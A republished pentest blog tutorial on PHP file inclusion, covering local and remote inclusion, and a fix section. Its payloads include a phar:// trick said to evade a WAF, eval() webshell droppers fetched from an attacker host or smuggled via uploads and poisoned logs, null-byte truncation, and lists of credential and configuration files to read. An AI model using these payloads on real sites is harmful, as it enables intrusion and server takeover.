File inclusion vulnerabilities (bypass techniques)


File inclusion is a class of vulnerability that comes up constantly in penetration tests; its main use is to get a webshell (Trojan file) onto the target while bypassing the WAF. While browsing a tools forum today I came across a new file inclusion technique, which I share here together with the basic usage of file inclusion vulnerabilities.

Special technique

The phar:// wrapper can help bypass some WAF detection during a penetration test. The phar:// stream wrapper has been available since PHP 5.3.0, and it appears to get past Safe Dog (安全狗, a common Chinese WAF) because the included path no longer looks like a plain .php or .txt file.

Utilization process

Create a new shell.php with the following content:

```php
<?php
include 'phar://test.rar/test.txt';
?>
```

Create a new test.txt with the following content:

```php
<?php
phpinfo();
?>
```

Compress test.txt into a zip archive. The archive can then be renamed to .zip, .phar, .rar or any other extension: phar:// inspects the file content (it accepts the zip and tar formats) and ignores the extension, so a renamed zip still opens, while a genuine RAR archive would not. Because phar:// is a local wrapper, this works even when allow_url_fopen and allow_url_include are off. After visiting shell.php, the phpinfo page appears.

Tested and confirmed

In a test environment, create shell.php and test.txt in the test directory and package test.txt into test.zip. shell.php holds the phar:// include shown above and test.txt the phpinfo() call; visiting shell.php returns the phpinfo page. (The original post shows the two files and the result as screenshots.)
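The archive for this trick can also be built from PHP itself. The following is an added example, not code from the original post: it uses ZipArchive (assumes the zip extension is loaded and that the script's directory is writable), writes test.txt into an archive, renames it to test.rar to show that the extension is irrelevant, and then includes it through phar://.

```php
<?php
// Added example (not from the original post): build the archive and include it
// through phar://. Assumes ext/zip is loaded and __DIR__ is writable.
$payload = "<?php phpinfo(); ?>";
$zipPath = __DIR__ . '/test.zip';
$rarPath = __DIR__ . '/test.rar';   // arbitrary extension; the content stays a zip

$zip = new ZipArchive();
if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
    exit("cannot create $zipPath\n");
}
$zip->addFromString('test.txt', $payload);
$zip->close();

// phar:// sniffs the archive format (zip or tar) and ignores the file extension,
// which is why the renamed file still opens. A genuine RAR archive would not.
rename($zipPath, $rarPath);

// phar:// is a local stream wrapper: neither allow_url_fopen nor
// allow_url_include is needed, and phar.readonly only restricts writing.
include 'phar://' . $rarPath . '/test.txt';
```

Run it from the command line with php to see the phpinfo() output, or drop it into the web root and request it; in a real engagement the archive would be uploaded as an innocuous image or document and the include pointed at its upload path.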

Reference: http://bbs.pediy.com/thread-216191.htm

PHP file inclusion vulnerabilities

File inclusion in PHP is divided into local inclusion and remote inclusion. The functions that can lead to a file inclusion vulnerability include:

  • include()
  • include_once()
  • require()
  • require_once()
  • fopen()
  • readfile()
    ……

include/include_once/require/require_once execute the target as PHP code; fopen() and readfile() only read it, so with those the impact is file disclosure rather than code execution.

Local file inclusion (LFI)

Create a new phpinfo.txt containing `<?php phpinfo(); ?>`, then create a new shell.php containing:

```php
<?php
include("phpinfo.txt");
?>
```

Visiting shell.php outputs the phpinfo page. Whatever the file's extension, an included file is executed as PHP code. If the file does not follow PHP syntax (that is, contains no `<?php ... ?>` block), include simply outputs its contents verbatim, which is what makes arbitrary file read possible.

Remote file inclusion (RFI)

Prerequisite: allow_url_include must be enabled. It is Off by default (since PHP 5.2) and also depends on allow_url_fopen being On.
Create a new php.txt:

```php
<?php
echo "hello world";
?>
```

Create a new index.php:

```php
<?php
include($_GET['page']);
?>
```

Visiting http://www.xxxx.com/index.php?page=http://www.xxxx.com/php.txt outputs hello world. The remote file is fetched over HTTP and executed by the including server, which is why it is served as .txt: if the hosting server executed it as PHP, only its output would be included.

Exploiting file inclusion

Reading sensitive files

For example: http://www.xxx.com/index.php?page=/etc/passwd

Windows:

  • c:\boot.ini
  • c:\windows\system32\inetsrv\MetaBase.xml (IIS configuration)
  • c:\windows\repair\sam (backup of the SAM password database)
  • c:\windows\php.ini (PHP configuration)
  • c:\windows\my.ini (MySQL configuration)

Linux:

  • /etc/passwd
  • /usr/local/app/apache2/conf/httpd.conf (Apache configuration)
  • /usr/local/app/php5/lib/php.ini (PHP configuration)
  • /etc/httpd/conf/httpd.conf (Apache configuration)
  • /etc/my.cnf (MySQL configuration)

Remote inclusion to drop a shell

Save the following as test.txt on a server you control:

```php
<?php
// single quotes keep $_POST literal instead of interpolating it into the written file
fputs(fopen("shell.php", "w"), '<?php eval($_POST["nmask"]); ?>');
?>
```

If the target site has a remote inclusion vulnerability, visiting http://www.xxx1.com/index.php?page=http://www.xx2.com/test.txt executes this on the target and writes shell.php into the directory of the vulnerable script (usually the web root) with the content:

```php
<?php eval($_POST["nmask"]); ?>
```

Local inclusion combined with file upload

If allow_url_include is off on the target, try local inclusion combined with a file upload.
Upload an image Trojan a.jpg with the content:

```php
<?php fputs(fopen("shell.php", "w"), '<?php eval($_POST["tzc"]); ?>'); ?>
```

Visit http://www.xxx.com/index.php?page=./a.jpg to generate shell.php locally. The upload filter only has to accept the .jpg; the include executes it as PHP regardless of extension.

Local inclusion of the Apache log to get a shell

The Apache log is split into access.log and error.log. Every request URL is recorded in access.log, and a request for a page that does not exist is recorded in error.log as well. For example, visiting http://www.xxx.com/<?php eval($_POST["nmask"]);?> writes the one-liner into access.log. In practice the browser URL-encodes the payload before it is logged, so you have to intercept the request with a proxy and edit the raw packet, placing the one-liner where Apache logs it verbatim (the User-Agent header is the usual choice). You also need to know the path of access.log (for example /var/log/apache2/access.log or /var/log/httpd/access_log); without it, this technique does not work.

Inclusion via /proc/self/environ

For example: http://www.test.com/view.php?page=../../../../proc/self/environ
This file holds the environment variables of the running web server process, some of which come from the request and are therefore attacker-controlled. The most common approach is to put the one-liner in the User-Agent header and include /proc/self/environ. Note that the request headers only end up in the process environment when PHP runs as CGI/FastCGI; under mod_php the file shows Apache's startup environment instead.

Inclusion via PHP wrappers
  • data: (PHP 5.2 and later); including it requires allow_url_include=On
  • php://input requires allow_url_include=On

Example:

```text
http://www.test.com/index.php?file=data:text/plain,<?php phpinfo();?>%00
```

The trailing %00 is only there to cut off a suffix appended by the application (see truncation below); it is not needed when the parameter is included as-is. The payload can also be base64-encoded to hide the PHP tags from a WAF: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

Truncation-based inclusion

Some developers append a fixed extension to try to prevent arbitrary local file inclusion:

```php
<?php
include $_GET['page'] . ".php";
?>
```

(1) Null-byte (%00) truncation
Create 1.jpg:

```php
<?php fputs(fopen("shell.php", "w"), '<?php eval($_POST["tzc"]); ?>'); ?>
```

With the code above, after uploading 1.jpg a request for http://www.xxx.com/index.php?page=1.jpg actually opens 1.jpg.php, which does not exist, so an error is reported. In that case try http://www.xxx.com/index.php?page=1.jpg%00: the null byte terminates the filename at the C level, so the appended .php is ignored. This only works on PHP older than 5.3.4 (later versions reject paths containing a null byte) and when magic_quotes_gpc is off.

(2) Long-path truncation

```text
././././././././././././././etc/passwd
or
////////////////////////////etc/passwd
or
../a/etc/passwd/../in/etc/passwd/../in/etc/passwd
```

The path is padded until it exceeds the maximum path length: 256 bytes on Windows and 4096 bytes on Linux. Old PHP versions silently discard everything beyond that limit, so the appended .php falls off the end; current versions fail on such paths instead, so this only applies to old targets.

Fixing file inclusion vulnerabilities

  • Set the open_basedir directive in php.ini to the application's directory; PHP then refuses to open files outside it.
  • Set allow_url_include=Off (and allow_url_fopen=Off if the application does not need it) to prevent remote files from being included.
  • In code, never pass user input to include/require as a path; map the parameter to a fixed list of allowed files.
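The code-level fix, as an added example that is not from the original post: the vulnerable include from earlier beside a hardened version that maps the request parameter to a fixed list of files and verifies the resolved path. The page names (home/about/contact), the pages/ directory and PHP 7 or later are assumptions of the example.

```php
<?php
// Added example (not from the original post). Assumed php.ini settings:
//   allow_url_include = Off
//   allow_url_fopen   = Off
//   open_basedir      = /var/www/html/
// Assumes page files live in ./pages/ next to this script (hypothetical layout).

// Vulnerable: user input reaches include() unfiltered, so ../, wrappers such as
// phar://, data:, php://input and (with allow_url_include=On) remote URLs all work.
function include_vulnerable(): void
{
    include $_GET['page'];
}

// Hardened: treat the parameter as a key into a fixed map, never as a path, and
// still verify that the resolved file sits inside the expected directory.
function include_hardened(): void
{
    $pages = [
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
    $key = $_GET['page'] ?? 'home';
    if (!array_key_exists($key, $pages)) {
        http_response_code(404);
        exit('no such page');
    }

    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . $pages[$key]);
    // realpath() returns false for missing files and resolves ../ and symlinks,
    // so a prefix check against the base directory is meaningful.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        exit('no such page');
    }
    include $path;
}

include_hardened();
```

With the map in place, ?page=../../etc/passwd, ?page=phar://x.jpg/a.txt and ?page=data:text/plain,... all fail the array_key_exists() check before any file is touched; the realpath() check is defence in depth against a later edit that builds the filename from the parameter again.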

JSP file inclusion

include directive

```jsp
<%@ include file="head.jsp" %>
<%@ include file="body.jsp" %>
<%@ include file="tail.jsp" %>
```

jsp:include action

```jsp
<jsp:include page="head.jsp" />
<jsp:include page="body.jsp" />
```

JSTL

```jsp
<c:import url="http://thief.one/1.jsp" />
```

Notes

(1) The include directive inserts the source code of head.jsp at translation time (when the JSP is compiled), whereas the jsp:include standard action inserts the response of head.jsp at request time. The action can therefore include dynamic as well as static content, while the directive simply appends the file's content statically to the main file.
(2) The first two methods can only include resources of the current web application; c:import can also fetch content from outside the container, such as a remote URL.

ASP file inclusion

Classic ASP appears unable to include remote files (an IIS security setting); it can only include local files, with the following syntax:

```asp
<!--#include file="1.asp" -->
```

ASPX file inclusion

ASPX uses the same server-side include syntax as ASP:

```asp
<!--#include file="top.aspx" -->
```

Related posts

[File upload vulnerabilities (bypass techniques)](http://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/)

Title: File inclusion vulnerabilities (bypass techniques)

Author: nmask

Published: 2017-04-10 14:04

Last updated: 2019-07-11 15:07

Original link: https://thief.one/2017/04/10/02/en/

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.
